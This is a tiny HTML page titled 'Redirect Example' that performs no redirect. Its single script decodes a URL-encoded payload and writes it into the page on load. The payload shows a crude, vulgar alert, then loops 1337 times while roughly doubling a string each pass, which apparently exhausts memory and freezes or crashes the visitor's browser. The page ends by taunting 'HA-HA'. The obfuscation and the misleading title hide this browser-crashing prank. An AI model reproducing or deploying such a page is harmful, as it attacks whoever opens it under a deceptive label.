<!DOCTYPE html>
<html>
<head>
	<title>Redirect Example</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
	<script>
	document.write(unescape('%3Cscript%3E%0Aalert(%27PREPARE%20YOUR%20ANUS%27)%3B%0Avar%20b%20%3D%20%27%5Cx4C%5CxEF%5Cx13%5Cx00%5Cx00%5Cx1b%5Cx8d%5Cxd4%27%3B%0Afor%20(a%20%3D0%3Ba%3C1337%3Ba%2B%2B)%20%7B%0Ab%2B%3Db%2B%27%5Cx4C%5CxEF%5Cx13%5Cx00%5Cx00%5Cx1b%5Cx8d%5Cxd4%27%3B%0Adocument.write(%27%3Chtml%3E%3Cmarquee%3E%3Ch1%3E%27%2Bb%2Bb)%3B%0A%7D%0A%3C%2Fscript%3E%0A%3C%2Fhead%3E%0A%3Cbody%3E%0A%3Cbody%20bgcolor%3D%22%230000000%22%3E%0A%3Cdiv%20align%3D%22center%22%3E%3Cp%3EHA-HA%3C%2Fp%3E%3C%2Fdiv%3E%20%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E'));
	</script>
<body>
</body>
</html>
